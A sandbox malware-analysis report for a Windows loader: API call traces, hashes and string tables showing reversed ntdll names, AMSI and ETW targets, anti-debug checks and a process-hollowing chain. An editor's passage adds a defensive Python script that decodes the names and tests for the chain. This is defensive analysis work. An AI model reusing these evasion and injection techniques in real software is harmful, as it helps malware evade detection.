                                                                                        • Instruction ID: f7a02cf9f48bf1b1ae5d8c47931ddaa642e4909edd183d054d39e01bf93484e1
                                                                                        • Opcode Fuzzy Hash: 4aa6e6e9700a1fb5ae6fc02a2ea1ad8e175e43bbebe4026d7624ebc037995988
                                                                                        • Instruction Fuzzy Hash: 40116D79600208BFEB15DFA8DD59FAEB7FDEB4C710F458464B901D7240DA30AA148B75
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027E7A9F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                        • API String ID: 4072585319-445027087
                                                                                        • Opcode ID: 4c60b699f862d9cc2561943658b149fa00e4ab2f2aecb5da56dc03f3848a8d46
                                                                                        • Instruction ID: 41dd084b77a26abc34124811db2759b9aa9520e85d45a835aa8bc7abe33a965f
                                                                                        • Opcode Fuzzy Hash: 4c60b699f862d9cc2561943658b149fa00e4ab2f2aecb5da56dc03f3848a8d46
                                                                                        • Instruction Fuzzy Hash: 64116D79600208BFEB15DFA8DD59F9EB7FDEB4C710F458464B901D7240DA30AA148B75
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E833D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                        • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                        • API String ID: 2521977463-737317276
                                                                                        • Opcode ID: 4fe163adfc6ecae244d0f3bcf02bdbb98a51d0bc72d18c6b5862653d6e33dbf4
                                                                                        • Instruction ID: 3976147d0fe3327558a10d0407bf0d3985119e7ba86eda2502cab677a2799ebd
                                                                                        • Opcode Fuzzy Hash: 4fe163adfc6ecae244d0f3bcf02bdbb98a51d0bc72d18c6b5862653d6e33dbf4
                                                                                        • Instruction Fuzzy Hash: 7E018C79600208AFEB01EFA8DC59F9EB7FEEB4C700F818420B502D7650D630A9048F35
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E7DEC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                        • String ID: Ntdll$yromeMlautriVetirW
                                                                                        • API String ID: 2719805696-3542721025
                                                                                        • Opcode ID: 542b5209f7f1e97550275743dd26ed702da1cd73ad970fcc290396a75edae737
                                                                                        • Instruction ID: 470bdd61d940c82849884b80620b905e2c527ff47094f591dcbcfb1fc29199c2
                                                                                        • Opcode Fuzzy Hash: 542b5209f7f1e97550275743dd26ed702da1cd73ad970fcc290396a75edae737
                                                                                        • Instruction Fuzzy Hash: EB018C79600208AFEB05EFA8D85AE9AB7FDEB4C700F518864B502DB640D630AD148F74
                                                                                        APIs
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027E8108,?,?,00000000,?,027E7A7E,ntdll,00000000,00000000,027E7AC3,?,?,00000000), ref: 027E80D6
                                                                                          • Part of subcall function 027E8098: GetModuleHandleA.KERNELBASE(?), ref: 027E80EA
                                                                                          • Part of subcall function 027E8140: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027E81C8,?,?,00000000,00000000,?,027E80E1,00000000,KernelBASE,00000000,00000000,027E8108), ref: 027E818D
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027E8193
                                                                                          • Part of subcall function 027E8140: GetProcAddress.KERNEL32(?,?), ref: 027E81A5
                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 027E85A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                        • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                        • API String ID: 3503870465-2520021413
                                                                                        • Opcode ID: a2aec7ec5a36c23c40a55e6a3a32739f5ff277555c9dc6949faad25c999710bd
                                                                                        • Instruction ID: 667e621c3df57fdbbb04fc00b5f97b0027d2e8eb4414e4923dbdd21c5c4e45e2
                                                                                        • Opcode Fuzzy Hash: a2aec7ec5a36c23c40a55e6a3a32739f5ff277555c9dc6949faad25c999710bd
                                                                                        • Instruction Fuzzy Hash: FE016DB8640208BFEB11EBA4DD59F5EBBFEEB4C714F918460B402D7650DA30A9048E35
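The String ID fields in the five blocks above are the loader's imports stored backwards: yromeMlautriVetacollAwZ is ZwAllocateVirtualMemory reversed, yromeMlautriVdaeRtN is NtReadVirtualMemory, yromeMlautriVetirW is WriteVirtualMemory, noitceSfOweiVpamnUtN is NtUnmapViewOfSection, and each function resolves its target through the GetModuleHandle/GetProcAddress subcalls listed next to it, so the names never appear forwards in the dropped file. Together with the CreateProcessAsUserW block they are the unmap/allocate/write chain behind the report's "Sample uses process hollowing technique" signature. The script below is an added example by the editor, not Joe Sandbox or sample code: it takes the String ID fields copied verbatim from the blocks above, decodes the reversed tokens, and checks whether the decoded set fills a minimal hollowing chain. The role predicates are the editor's own minimal definition, not the report's detection rule, and the API-prefix regex is a heuristic that covers the names seen on this page.

```python
"""Decode reversed API names from the report's String ID fields and check
whether they form a process-hollowing chain. Added example, not Joe Sandbox
or sample code; assumes the strings are copied verbatim from the report."""
import re

# Copied from the 'String ID' fields above; '$' separates the strings that
# Joe Sandbox found referenced by one function.
REPORT_STRING_IDS = [
    "CreateProcessAsUserW$Kernel32",
    "ntdll$yromeMlautriVetacollAwZ",
    "ntdll$yromeMlautriVdaeRtN",
    "Ntdll$yromeMlautriVetirW",
    "noitceSfOweiVpamnUtN$ntdll",
]

# Module names sit next to the API names and are stored forwards.
MODULE_NAMES = {"ntdll", "kernel32", "kernelbase"}

# Heuristic (editor's assumption): a string is an API name if it starts like a
# native stub (Nt/Zw/Rtl/Ldr) or a common Win32 verb followed by a capital.
API_PREFIX_RE = re.compile(
    r"(Nt|Zw|Rtl|Ldr)[A-Z]|(Create|Get|Set|Open|Read|Write|Virtual)[A-Z]"
)


def api_base(name):
    """Strip the Nt/Zw prefix: NtX and ZwX are the same user-mode syscall stub,
    and the report stores WriteVirtualMemory without any prefix at all."""
    return re.sub(r"^(Nt|Zw)", "", name)


# Minimal hollowing chain (editor's definition): spawn a target, unmap its
# image, allocate in it, write the payload. Thread-context APIs are not on
# this page, so they are deliberately not part of the check.
HOLLOWING_ROLES = {
    "create_target": lambda base: base.startswith("CreateProcess"),
    "unmap_original": lambda base: base == "UnmapViewOfSection",
    "allocate": lambda base: base == "AllocateVirtualMemory",
    "write_payload": lambda base: base == "WriteVirtualMemory",
}


def decode_token(token):
    """Return (api_name, was_reversed) for one '$'-separated token."""
    if token.lower() in MODULE_NAMES:
        return token, False
    if API_PREFIX_RE.match(token):
        return token, False            # already a forward API name
    reversed_token = token[::-1]
    if API_PREFIX_RE.match(reversed_token):
        return reversed_token, True    # stored reversed, as the loader does
    return token, False                # unknown string; leave untouched


def decode_string_ids(string_ids):
    """Map every decoded API name to the raw form it appeared in."""
    decoded = {}
    for field in string_ids:
        for token in field.split("$"):
            name, _was_reversed = decode_token(token)
            if name.lower() not in MODULE_NAMES:
                decoded[name] = token
    return decoded


def hollowing_assessment(string_ids):
    """Report which chain roles the decoded names fill and which are missing."""
    names = decode_string_ids(string_ids)
    filled = {
        role: sorted(n for n in names if pred(api_base(n)))
        for role, pred in HOLLOWING_ROLES.items()
    }
    missing = [role for role, hits in filled.items() if not hits]
    return {"filled": filled, "missing": missing, "complete": not missing}


if __name__ == "__main__":
    for name, raw in decode_string_ids(REPORT_STRING_IDS).items():
        print(f"{raw:28} -> {name}")
    print(hollowing_assessment(REPORT_STRING_IDS))
```

Run against the five fields above, every role is filled; drop any one block (for instance the NtUnmapViewOfSection one) and the assessment reports that role as missing, which is the check to apply to a sample that reverses names but only reads memory. The same decoder applies to any string dump of this loader family as long as the names are stored as plain reversed ASCII; a sample that XORs or otherwise encodes them needs its decoding step inserted before decode_token.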
                                                                                        APIs
                                                                                        • Rt.N(?,?,00000000,027EDF72), ref: 027EDF20
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF36
                                                                                        • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$DeleteFileNameName_
                                                                                        • String ID:
                                                                                        • API String ID: 4284456518-0
                                                                                        • Opcode ID: feee4cddee16ccc849673cdc9b4b2a5aa4a96b3e0fd568bc8f0a47bd880fa085
                                                                                        • Instruction ID: 31868c32112264d5b84956b80603befb59388fc809a73feb8457e239f5682e42
                                                                                        • Opcode Fuzzy Hash: feee4cddee16ccc849673cdc9b4b2a5aa4a96b3e0fd568bc8f0a47bd880fa085
                                                                                        • Instruction Fuzzy Hash: 9A01D675A442487EEF12E7A0CD9ABCD77BDAB49300F5004D2D211F7081DA30AB088B71
                                                                                        APIs
                                                                                          • Part of subcall function 027D4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 027D4F2E
                                                                                        • Rt.N(?,?,00000000,027EDF72), ref: 027EDF20
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF36
                                                                                        • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF55
                                                                                          • Part of subcall function 027D4C60: SysFreeString.OLEAUT32(027EF798), ref: 027D4C6E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                        • String ID:
                                                                                        • API String ID: 1530111750-0
                                                                                        • Opcode ID: ad64351bc3a147d3aee5164ba1e9464b6f87384a82a44bfa4bbf3f52b96eadcf
                                                                                        • Instruction ID: 98484f54284729e639ff1feb2617556f6a181fc465302b4cf0866192a43abb6f
                                                                                        • Opcode Fuzzy Hash: ad64351bc3a147d3aee5164ba1e9464b6f87384a82a44bfa4bbf3f52b96eadcf
                                                                                        • Instruction Fuzzy Hash: DB014471940208BADB12EBA0CD96FDEB7FDDB49700F5044A1E601E6180EA74AB048A75
                                                                                        APIs
                                                                                          • Part of subcall function 027E6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,027E6DB9,?,?,?,00000000), ref: 027E6D99
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,027E6EAC,00000000,00000000,027E6E2B,?,00000000,027E6E9B), ref: 027E6E17
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFromInstanceProg
                                                                                        • String ID:
                                                                                        • API String ID: 2151042543-0
                                                                                        • Opcode ID: d5e6a360ae420c6379cd9d0935e8f183a809ebf7dc1b913ff98a9e838b16752f
                                                                                        • Instruction ID: 9b0cbc3f403dcc89f16dcdaec5e63770ecdd77ae7a70201d8cab3679f94c83b7
                                                                                        • Opcode Fuzzy Hash: d5e6a360ae420c6379cd9d0935e8f183a809ebf7dc1b913ff98a9e838b16752f
                                                                                        • Instruction Fuzzy Hash: 2B01DF71208704AEEF12EF61DC2286FBBBDE74DB00B910879F406E2680E6309900C970
                                                                                        APIs
                                                                                        • InetIsOffline.URL(00000000,00000000,027FB99E,?,?,?,00000305,00000000,00000000), ref: 027EFAF6
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                          • Part of subcall function 027EF9DC: GetModuleHandleW.KERNEL32(KernelBase,?,027EFDE0,UacInitialize,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString), ref: 027EF9E2
                                                                                          • Part of subcall function 027EF9DC: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027EF9F4
                                                                                          • Part of subcall function 027EFA38: GetModuleHandleW.KERNEL32(KernelBase), ref: 027EFA48
                                                                                          • Part of subcall function 027EFA38: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 027EFA5A
                                                                                          • Part of subcall function 027EFA38: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 027EFA71
                                                                                          • Part of subcall function 027D7E5C: GetFileAttributesA.KERNEL32(00000000,?,027F0714,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,UacInitialize), ref: 027D7E67
                                                                                          • Part of subcall function 027DC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0291F8C4,?,027F0A46,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession), ref: 027DC37B
                                                                                          • Part of subcall function 027EE064: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027EE134), ref: 027EE09F
                                                                                          • Part of subcall function 027EE064: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,027EE134), ref: 027EE0CF
                                                                                          • Part of subcall function 027EE064: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 027EE0E4
                                                                                          • Part of subcall function 027EE064: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 027EE110
                                                                                          • Part of subcall function 027EE064: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 027EE119
                                                                                          • Part of subcall function 027D7E80: GetFileAttributesA.KERNEL32(00000000,?,027F3891,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,Initialize), ref: 027D7E8B
                                                                                          • Part of subcall function 027D8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,027F3A2F,OpenSession,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4,Initialize,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4), ref: 027D8055
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Module$AddressHandleProc$AttributesLibraryNamePath$CheckCloseCreateDebuggerDirectoryFreeInetInformationLoadName_OfflineOpenPresentQueryReadRemote
                                                                                        • String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                        • API String ID: 2044571854-184510087
                                                                                        • Opcode ID: 4d88536e74b4559dae4bd485161a7462ba406c3bbcf723a673e621b2469f94bf
                                                                                        • Instruction ID: 3c4b08234970c144253658b5cabe0b23ff09f0b4f9402b1eaedd44ba74cfde20
                                                                                        • Opcode Fuzzy Hash: 4d88536e74b4559dae4bd485161a7462ba406c3bbcf723a673e621b2469f94bf
                                                                                        • Instruction Fuzzy Hash: A0143C39A1425D8BDF52EB65DC95ADEB3B6FF88300F1040E2A549AB310DB30AE95CF51

                                                                                        Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed). Function at 27f82f8, basic blocks 27f82f8-27fb4a5; Win32 API calls reached in the graph: CreateProcessAsUserW, ResumeThread, CloseHandle, ExitProcess.
                                                                                        APIs
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0291F7DC,0291F820,OpenSession,0282B37C,027FB9D4,UacScan,0282B37C), ref: 027F88B9
                                                                                        • ResumeThread.KERNEL32(00000000,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4), ref: 027F8F03
                                                                                        • CloseHandle.KERNEL32(00000000,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,00000000,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C), ref: 027F9082
                                                                                          • Part of subcall function 027E8818: LoadLibraryW.KERNEL32(bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,UacScan), ref: 027E882C
                                                                                          • Part of subcall function 027E8818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027E8846
                                                                                          • Part of subcall function 027E8818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize), ref: 027E8882
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0282B37C,027FB9D4,UacInitialize,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,UacScan,0282B37C), ref: 027F9474
                                                                                          • Part of subcall function 027D7E5C: GetFileAttributesA.KERNEL32(00000000,?,027F0714,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,UacInitialize), ref: 027D7E67
                                                                                          • Part of subcall function 027EDF80: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027EE052), ref: 027EDFBF
                                                                                          • Part of subcall function 027EDF80: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027EDFF9
